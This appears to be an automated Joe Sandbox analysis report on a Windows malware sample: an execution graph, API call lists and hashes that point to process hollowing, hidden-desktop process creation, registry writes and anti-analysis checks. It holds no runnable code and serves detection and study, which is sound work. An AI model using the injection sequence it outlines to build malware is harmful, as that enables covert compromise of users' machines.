                                                                                                                                                                                                                                • API String ID: 1846318660-2556327735
                                                                                                                                                                                                                                • Opcode ID: f24d1ae00189e6b09db2d4e004e1459bc1d50a5556b843e4c2dffed39cc941e9
                                                                                                                                                                                                                                • Instruction ID: 9a68b2b406cbc3be0d1e3b01e8bc2dae81f5f91d8a7392b0d1e46fe811c818c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f24d1ae00189e6b09db2d4e004e1459bc1d50a5556b843e4c2dffed39cc941e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E0CDB69103086BC180BFF8DC01886B7DDDF565607208627F664E7600F770D5408BE4

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:9.4%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                Signature Coverage:2.8%
                                                                                                                                                                                                                                Total number of Nodes:1209
                                                                                                                                                                                                                                Total number of Limit Nodes:19
1558e01 14867->14868 14882 1558e1d 14868->14882 14870 1558e17 14871 1558c39 14870->14871 14872 1558c65 14871->14872 14873 1558c43 14871->14873 14872->14815 14874 1558c4f RegCloseKey 14873->14874 14875 1558c49 RegFlushKey 14873->14875 14876 1540d9d 11 API calls 14874->14876 14875->14874 14876->14872 14878 1558c39 13 API calls 14877->14878 14879 1558ca5 14878->14879 14880 1540df1 11 API calls 14879->14880 14881 1558cb2 14880->14881 14881->14861 14883 1558e35 14882->14883 14884 1558e49 RegSetValueExA 14883->14884 14885 1558e57 14884->14885 14886 1558e76 14884->14886 14887 1547b2d 42 API calls 14885->14887 14886->14870 14887->14886 14890 1556d32 14888->14890 14889 1556d87 14891 1540d9d 11 API calls 14889->14891 14890->14889 14892 1556d5d CreateFileA 14890->14892 14893 1556d9c Sleep 14891->14893 14892->14889 14894 1556d6a WriteFile CloseHandle 14892->14894 14893->14820 14894->14889 14923 1558549 14895->14923 14901 155648b 14898->14901 14899 1540d9d 11 API calls 14900 15564c9 14899->14900 14900->14314 14901->14899 14903 1556809 14902->14903 14904 1556829 MessageBoxA 14903->14904 14905 1540d9d 11 API calls 14904->14905 14906 1556848 14905->14906 14906->14314 14934 1544a69 14907->14934 14909 1556725 14910 1556734 14909->14910 14911 1556749 14909->14911 14941 15564d9 14910->14941 14966 15449fd 14911->14966 14914 1556745 14915 1540dc1 11 API calls 14914->14915 14916 1556795 14915->14916 14916->14314 14917 1556754 14918 155676c ShellExecuteA 14917->14918 14918->14914 14920 154434d 14919->14920 14921 1540e8d 11 API calls 14920->14921 14922 1544355 14921->14922 14922->14314 14924 1558576 14923->14924 14925 1541369 11 API calls 14924->14925 14932 1558580 14925->14932 14926 1558676 14927 1541369 11 API calls 14926->14927 14928 1558684 14927->14928 14929 1540d9d 11 API calls 14928->14929 14930 1558699 14929->14930 14930->14314 14931 1540f85 11 API calls 14931->14932 14932->14926 14932->14931 14933 1541291 11 API calls 14932->14933 14933->14932 14935 1544a7c 14934->14935 14936 
1544a9a 14935->14936 14939 1544a89 14935->14939 14937 1544a98 14936->14937 14938 1540d9d 11 API calls 14936->14938 14937->14909 14938->14937 14940 1541299 11 API calls 14939->14940 14940->14937 14942 1556503 14941->14942 14943 15410f9 11 API calls 14942->14943 14949 155655a 14942->14949 14944 1556544 14943->14944 14970 15442a1 14944->14970 14947 1540e35 11 API calls 14947->14949 14948 15565ad 14951 15565bb 14948->14951 14953 1556628 14948->14953 14949->14948 14950 15565a0 CreateDesktopA 14949->14950 14950->14948 14952 15565e3 CreateProcessA 14951->14952 14954 1556697 14952->14954 14959 15565f1 14952->14959 14957 1556659 CreateProcessA 14953->14957 14955 15566a2 WaitForSingleObject 14954->14955 14956 15566aa 14954->14956 14955->14956 14958 1540dc1 11 API calls 14956->14958 14957->14954 14963 1556663 14957->14963 14960 15566c4 14958->14960 14961 155661e CreateProcessA 14959->14961 14962 1540dc1 11 API calls 14960->14962 14961->14954 14964 15566d1 14962->14964 14965 155668f CreateProcessA 14963->14965 14964->14914 14965->14954 14967 1544a10 14966->14967 14968 1541299 11 API calls 14967->14968 14969 1544a21 14968->14969 14969->14917 14971 15442b0 14970->14971 14972 15442d2 14971->14972 14973 15442c9 14971->14973 14975 1541299 11 API calls 14972->14975 14974 1540d9d 11 API calls 14973->14974 14976 15442d0 14974->14976 14975->14976 14976->14947 14978 1557d92 14977->14978 14986 1557db7 14978->14986 15057 15535dd 14978->15057 14980 1540dc1 11 API calls 14981 155836a 14980->14981 14982 1540d9d 11 API calls 14981->14982 14983 1558372 14982->14983 14984 1540dc1 11 API calls 14983->14984 14985 155837f 14984->14985 14985->14377 14987 1557e9c 14986->14987 14989 1557e3e 14986->14989 15033 15581d6 14986->15033 14988 1557eb8 CreateProcessA 14987->14988 14990 1557ec6 CreateProcessA 14988->14990 14991 1557f1c 14988->14991 14993 1557e65 CreateProcessA 14989->14993 14990->14991 14994 1557ee6 14990->14994 15064 1557bb9 14991->15064 14993->14991 14996 1557e73 CreateProcessA 14993->14996 
14997 1544a31 11 API calls 14994->14997 15000 1557e97 14996->15000 14996->15033 14998 1557f05 14997->14998 15004 1557f0d CreateProcessA 14998->15004 14999 1558312 15002 1558316 14999->15002 15003 1558348 GetTickCount 14999->15003 15000->14991 15006 1553a35 12 API calls 15002->15006 15003->15033 15004->14991 15004->15033 15005 1557f6d 15007 1558222 15005->15007 15008 1557f7a 15005->15008 15006->15003 15009 1553a35 12 API calls 15007->15009 15010 1557f93 15008->15010 15011 155800e 15008->15011 15013 1558254 15009->15013 15014 1553a35 12 API calls 15010->15014 15074 15579e5 15011->15074 15015 1558273 15013->15015 15016 1558259 15013->15016 15017 1557fc9 15014->15017 15019 1558292 15015->15019 15020 1558278 15015->15020 15018 1557d61 26 API calls 15016->15018 15021 1557ff0 15017->15021 15022 1557fcd 15017->15022 15018->15033 15030 15567f9 12 API calls 15019->15030 15023 1557d61 26 API calls 15020->15023 15025 15579e5 12 API calls 15021->15025 15024 15579e5 12 API calls 15022->15024 15023->15033 15027 1557feb 15024->15027 15025->15027 15026 1558049 15028 1558064 15026->15028 15029 155818b 15026->15029 15027->15026 15087 15579ad 15027->15087 15077 1557cbd 15028->15077 15034 1553a35 12 API calls 15029->15034 15030->15033 15033->14980 15036 15581bd 15034->15036 15035 155806c 15080 1557a7d 15035->15080 15038 15581c3 15036->15038 15039 15581dd 15036->15039 15042 1557d61 26 API calls 15038->15042 15040 15581e2 15039->15040 15041 15581fc 15039->15041 15043 1557d61 26 API calls 15040->15043 15045 15567f9 12 API calls 15041->15045 15042->15033 15043->15033 15044 155816f 15046 1553a35 12 API calls 15044->15046 15045->15033 15046->14999 15047 15580a1 15047->15044 15048 1553a35 12 API calls 15047->15048 15049 1558118 15048->15049 15049->15044 15050 1557a7d 12 API calls 15049->15050 15051 155813d 15050->15051 15052 1553a35 12 API calls 15051->15052 15052->15044 15054 1544112 15053->15054 15055 1541369 11 API calls 15054->15055 15056 154411d 15055->15056 15056->14351 15090 15533d9 
15057->15090 15059 15535ee 15093 155328d CreateFileW 15059->15093 15061 15535f3 15104 1553711 15061->15104 15065 15579e5 12 API calls 15064->15065 15066 1557bd2 15065->15066 15066->14999 15067 1553a35 15066->15067 15068 1553a49 15067->15068 15125 1553551 15068->15125 15070 1553a8e 15071 1553a97 GetTickCount 15070->15071 15072 1540d9d 11 API calls 15071->15072 15073 1553ac8 15072->15073 15073->15005 15075 1553a35 12 API calls 15074->15075 15076 1557a37 15075->15076 15076->15027 15078 153f81d 11 API calls 15077->15078 15079 1557ce1 15078->15079 15079->15035 15081 1553a35 12 API calls 15080->15081 15082 1557ad3 15081->15082 15083 1553a35 12 API calls 15082->15083 15084 1557b15 15083->15084 15085 1557b4d 15084->15085 15086 1553a35 12 API calls 15084->15086 15085->15047 15086->15085 15129 1557951 GetModuleHandleA GetProcAddress 15087->15129 15108 15533cd GetPEB 15090->15108 15092 15533ee 15092->15059 15094 15532b5 MessageBoxA 15093->15094 15095 15532c8 GetFileSize 15093->15095 15094->15095 15096 153f81d 11 API calls 15095->15096 15097 15532dd ReadFile 15096->15097 15098 15532f6 MessageBoxA 15097->15098 15099 1553309 15097->15099 15098->15099 15100 153f81d 11 API calls 15099->15100 15102 1553326 15100->15102 15101 153f84d 11 API calls 15103 15533ad CloseHandle 15101->15103 15102->15101 15103->15061 15105 1553716 15104->15105 15109 15536ad 15105->15109 15108->15092 15114 1553601 15109->15114 15111 15536c9 15112 1540d9d 11 API calls 15111->15112 15113 15535fd 15112->15113 15113->14986 15115 1544845 4 API calls 15114->15115 15116 155360e 15115->15116 15117 155362e 15116->15117 15118 1544845 4 API calls 15116->15118 15119 1540df1 11 API calls 15117->15119 15121 155361c 15118->15121 15120 155363a 15119->15120 15120->15111 15121->15117 15122 1553620 15121->15122 15123 1540df1 11 API calls 15122->15123 15124 155362c 15123->15124 15124->15111 15126 1553561 15125->15126 15127 1540d9d 11 API calls 15126->15127 15128 15535a6 15127->15128 15128->15070 15130 1557982 15129->15130 
15130->15026 15132 1557304 15131->15132 15133 1540d9d 11 API calls 15132->15133 15134 1557319 15133->15134 15154 1548621 15134->15154 15136 1557323 15157 15448e5 15136->15157 15139 1557421 15140 1540dc1 11 API calls 15139->15140 15141 155743e 15140->15141 15143 1540d9d 11 API calls 15141->15143 15142 1544151 11 API calls 15147 1557354 15142->15147 15145 1557457 15143->15145 15145->14391 15146 15573dc 15171 1544959 15146->15171 15147->15142 15147->15146 15150 15572cd 20 API calls 15147->15150 15166 1544935 FindNextFileA 15147->15166 15150->15147 15152 1540df1 11 API calls 15151->15152 15153 15574b0 15152->15153 15153->14398 15174 1548635 15154->15174 15158 1541239 15157->15158 15159 15448ff FindFirstFileA 15158->15159 15160 1544925 GetLastError 15159->15160 15161 154490f 15159->15161 15162 1544923 15160->15162 15179 1544879 15161->15179 15162->15139 15162->15147 15164 1544916 15164->15162 15165 1544959 FindClose 15164->15165 15165->15162 15167 1544952 GetLastError 15166->15167 15168 1544949 15166->15168 15167->15147 15169 1544879 4 API calls 15168->15169 15170 1544950 15169->15170 15170->15147 15172 1544964 FindClose 15171->15172 15173 1544971 15171->15173 15172->15173 15173->14391 15175 1540df1 11 API calls 15174->15175 15176 1548644 15175->15176 15177 1548630 15176->15177 15178 1541041 11 API calls 15176->15178 15177->15136 15178->15177 15180 154489c 15179->15180 15181 15448a4 FileTimeToLocalFileTime FileTimeToDosDateTime 15180->15181 15182 1544882 FindNextFileA 15180->15182 15184 15448d9 15181->15184 15182->15180 15183 1544893 GetLastError 15182->15183 15183->15184 15184->15164 15186 1540df1 11 API calls 15185->15186 15187 1559922 15186->15187 15188 1541291 11 API calls 15187->15188 15189 1559958 15187->15189 15188->15187 15189->14410 15190->14047 15192 1540adc 15191->15192 15193 1540aa6 15191->15193 15192->13945 15193->15192 15194 1542051 30 API calls 15193->15194 15195 1542bb1 42 API calls 15193->15195 15194->15193 15195->15193 15196 153f751 15197 153f766 
15196->15197 15198 153f779 15196->15198 15234 153e96d RtlInitializeCriticalSection 15197->15234 15200 153f790 RtlEnterCriticalSection 15198->15200 15201 153f79a 15198->15201 15200->15201 15212 153f54d 15201->15212 15204 153f76f 15206 153f7a7 15208 153f809 15206->15208 15209 153f7ff RtlLeaveCriticalSection 15206->15209 15209->15208 15210 153f7b3 15210->15206 15241 153f375 15210->15241 15213 153f561 15212->15213 15214 153f584 15213->15214 15215 153f623 15213->15215 15217 153f593 15213->15217 15214->15206 15222 153f1c9 15214->15222 15215->15214 15220 153f6be 15215->15220 15258 153ef11 15215->15258 15266 153f015 15215->15266 15217->15214 15255 153ec59 15217->15255 15220->15214 15262 153ee19 15220->15262 15223 153f1e4 15222->15223 15224 153f1db 15222->15224 15227 153f20d RtlEnterCriticalSection 15223->15227 15228 153f217 15223->15228 15231 153f1ec 15223->15231 15225 153e96d 4 API calls 15224->15225 15226 153f1e0 15225->15226 15226->15223 15226->15231 15227->15228 15228->15231 15348 153f081 15228->15348 15231->15210 15232 153f364 15232->15210 15233 153f35a RtlLeaveCriticalSection 15233->15232 15235 153e992 RtlEnterCriticalSection 15234->15235 15236 153e99c 15234->15236 15235->15236 15237 153e9ba LocalAlloc 15236->15237 15238 153e9d4 15237->15238 15239 153ea34 15238->15239 15240 153ea2a RtlLeaveCriticalSection 15238->15240 15239->15198 15239->15204 15240->15239 15242 153f38e 15241->15242 15243 153f393 15241->15243 15244 153e96d 4 API calls 15242->15244 15245 153f3c4 RtlEnterCriticalSection 15243->15245 15246 153f3ce 15243->15246 15252 153f397 15243->15252 15244->15243 15245->15246 15247 153f47a 15246->15247 15251 153f3e4 15246->15251 15253 153f4a6 15246->15253 15250 153ef11 7 API calls 15247->15250 15247->15252 15248 153f531 RtlLeaveCriticalSection 15249 153f53b 15248->15249 15249->15206 15250->15252 15251->15248 15251->15249 15252->15206 15253->15251 15254 153ee19 7 API calls 15253->15254 15254->15251 15256 153f375 9 API calls 15255->15256 15257 153ec7a 15256->15257 
15257->15214 15259 153ef23 15258->15259 15260 153ef1a 15258->15260 15259->15215 15260->15259 15261 153ec59 9 API calls 15260->15261 15261->15259 15263 153eeb4 15262->15263 15264 153ee3e 15262->15264 15263->15264 15271 153ed5d 15263->15271 15264->15214 15326 153e795 15266->15326 15268 153f02a 15269 153f037 15268->15269 15337 153ef5d 15268->15337 15269->15215 15272 153ed71 15271->15272 15273 153eda9 15272->15273 15274 153edbf 15272->15274 15283 153ee0d 15272->15283 15284 153e8d9 15273->15284 15276 153e8d9 3 API calls 15274->15276 15277 153edbd 15276->15277 15277->15283 15294 153ec1d 15277->15294 15279 153ede0 15280 153ee02 15279->15280 15299 153ec7d 15279->15299 15304 153e309 15280->15304 15283->15264 15285 153e903 15284->15285 15286 153e960 15284->15286 15308 153e631 15285->15308 15286->15277 15291 153e93b 15291->15286 15293 153e309 LocalAlloc 15291->15293 15293->15286 15295 153ec42 15294->15295 15296 153ec2f 15294->15296 15295->15279 15297 153ee19 9 API calls 15296->15297 15298 153ec3f 15297->15298 15298->15279 15300 153ec82 15299->15300 15301 153ec90 15299->15301 15302 153ec59 9 API calls 15300->15302 15301->15280 15303 153ec8f 15302->15303 15303->15280 15305 153e31b 15304->15305 15306 153e33e 15305->15306 15307 153e1f1 LocalAlloc 15305->15307 15306->15283 15307->15306 15310 153e682 15308->15310 15309 153e6e3 15312 153e281 15309->15312 15310->15309 15311 153e6b4 VirtualFree 15310->15311 15311->15310 15313 153e29c 15312->15313 15320 153e1f1 15313->15320 15316 153e4a9 15319 153e4d7 15316->15319 15317 153e54b 15317->15291 15318 153e515 VirtualFree 15318->15319 15319->15317 15319->15318 15323 153e165 15320->15323 15322 153e1ff 15322->15291 15322->15316 15324 153e173 LocalAlloc 15323->15324 15325 153e18a 15323->15325 15324->15325 15325->15322 15329 153e7b8 15326->15329 15327 153e87e 15333 153e82a 15327->15333 15344 153e571 15327->15344 15328 153e431 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 15328->15329 15329->15327 15329->15328 15330 153e281 LocalAlloc 
15329->15330 15332 153e864 15329->15332 15335 153e819 15329->15335 15330->15329 15334 153e4a9 VirtualFree 15332->15334 15333->15268 15334->15333 15336 153e4a9 VirtualFree 15335->15336 15336->15333 15338 153ef11 9 API calls 15337->15338 15339 153ef71 15338->15339 15340 153e281 LocalAlloc 15339->15340 15341 153ef81 15340->15341 15342 153ec1d 9 API calls 15341->15342 15343 153ef89 15341->15343 15342->15343 15343->15269 15346 153e5c4 15344->15346 15345 153e613 15345->15333 15346->15345 15347 153e5fa VirtualAlloc 15346->15347 15347->15345 15347->15346 15351 153f098 15348->15351 15349 153f0d9 15350 153ee19 9 API calls 15349->15350 15353 153f100 15349->15353 15350->15353 15351->15349 15351->15353 15354 153efe9 15351->15354 15353->15232 15353->15233 15359 153e6ed 15354->15359 15356 153eff9 15357 153f006 15356->15357 15358 153ef5d 9 API calls 15356->15358 15357->15351 15358->15357 15362 153e70b 15359->15362 15361 153e719 15363 153e571 VirtualAlloc 15361->15363 15362->15361 15364 153e281 LocalAlloc 15362->15364 15365 153e779 15362->15365 15367 153e727 15362->15367 15368 153e3cd 15362->15368 15363->15367 15364->15362 15366 153e4a9 VirtualFree 15365->15366 15366->15367 15367->15356 15369 153e3dc VirtualAlloc 15368->15369 15371 153e409 15369->15371 15372 153e42c 15369->15372 15373 153e1f1 LocalAlloc 15371->15373 15372->15362 15374 153e415 15373->15374 15374->15372 15375 153e419 VirtualFree 15374->15375 15375->15372 15376 15535cf LdrInitializeThunk

Control-flow Graph

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 01542300
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154231E
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154233C
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0154235A
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 015423A3
• RegQueryValueExA.ADVAPI32(?,01542565,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001), ref: 015423C1
• RegCloseKey.ADVAPI32(?,015423F0,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 015423E3
• lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 01542400
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0154240D
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 01542413
• lstrlen.KERNEL32(00000000), ref: 0154243E
• lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 01542493
• LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424A3
• lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 015424CF
• LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424DF
• lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542509
• LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542519
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1759228003-2375825460
• Opcode ID: 970e6a7541e99a5ec4272b10ef8025d9db8f4d7f9e263cb9da73fa3b732ff94a
• Instruction ID: a01431ac8e7e191ff7431f32d14711d1c9b7a5f02f8f1685e535572915ef842d
• Opcode Fuzzy Hash: 970e6a7541e99a5ec4272b10ef8025d9db8f4d7f9e263cb9da73fa3b732ff94a
• Instruction Fuzzy Hash: 24614F71A0421E7EEB11DAE8DC46FEFB7FCEB98304F404095B645EB181D6B8DA448B60

Control-flow Graph

APIs
• lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 01542400
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0154240D
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 01542413
• lstrlen.KERNEL32(00000000), ref: 0154243E
• lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 01542493
• LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424A3
• lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 015424CF
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424DF
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542509
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542519
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1599918012-0
                                                                                                                                                                                                                                • Opcode ID: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
                                                                                                                                                                                                                                • Instruction ID: 6198711cb75d6773e528559533748d653b9497bf5175b8ded32f3c977b25010f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4316471E0421A7FEB25DAE8D885FEEB7FCEB98304F404191A145EB180D6B89A448F50

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 015447F8
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000000,?), ref: 01544803
                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0154481C
                                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0154482D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2659516521-0
                                                                                                                                                                                                                                • Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                                                                                                                                                • Instruction ID: 5c127c08d88aed6651e294a06a52abbbea07ec24377774d0372e986c3910a585
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F06872C0021D77CB20DAF98C85ACFB3BC7B08318F400392B529E6180E6309B448B50

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380), ref: 01557E66
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01557E8A
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380), ref: 01557EBD
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01557EDD
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01557F0F
                                                                                                                                                                                                                                  • Part of subcall function 01553A35: GetTickCount.KERNEL32 ref: 01553AAE
                                                                                                                                                                                                                                  • Part of subcall function 015567F9: MessageBoxA.USER32(00000000,00000000,01556859,00040040), ref: 0155682C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 01558348
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateProcess$CountTick$Message
                                                                                                                                                                                                                                • String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
                                                                                                                                                                                                                                • API String ID: 2713535555-1661097759
                                                                                                                                                                                                                                • Opcode ID: 24a8b62563874e9327889ce5f6c6d40886226817bcf6a558d56d713d1fc43888
                                                                                                                                                                                                                                • Instruction ID: 38168dc764e355c18afa7a55202d34cc2a4e9fc4f1829ec524cea1975df3b512
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24a8b62563874e9327889ce5f6c6d40886226817bcf6a558d56d713d1fc43888
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92120F70A00219EFDB90DBA9CC95FEDBBF4BF48704F504096EA54EB291D770AA448F61

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 0153FAA6
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,00000000), ref: 0153FAB2
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,00000000), ref: 0153FADA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 0153FAE6
                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000), ref: 0153FB27
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000), ref: 0153FB33
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000), ref: 0153FB6B
                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000), ref: 0153FB77
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                                                                • String ID: $"$"
                                                                                                                                                                                                                                • API String ID: 3213498283-938660540
                                                                                                                                                                                                                                • Opcode ID: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
                                                                                                                                                                                                                                • Instruction ID: 4708cfcaf019a736e2fd2a5a84836ae4eb4259ac6f006c27c9fafd46d25a47ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F51D6B4A042829FD325DF6CC894A19FBE5FF9A350B640C5AE4C4CF312E375A881DB52

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Executing manually will not work,0155A789,00000000), ref: 0155A54A
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,no data,0155A789,00000000), ref: 0155A5C2
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0155A65A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CountTick
                                                                                                                                                                                                                                • String ID: Executing manually will not work$TYQLVoFn$no data
                                                                                                                                                                                                                                • API String ID: 1431039135-2158577219
                                                                                                                                                                                                                                • Opcode ID: e3af6d9eea52ac4946b40bf0275076d504aa9fd8a7475b892ceb9297553fbf31
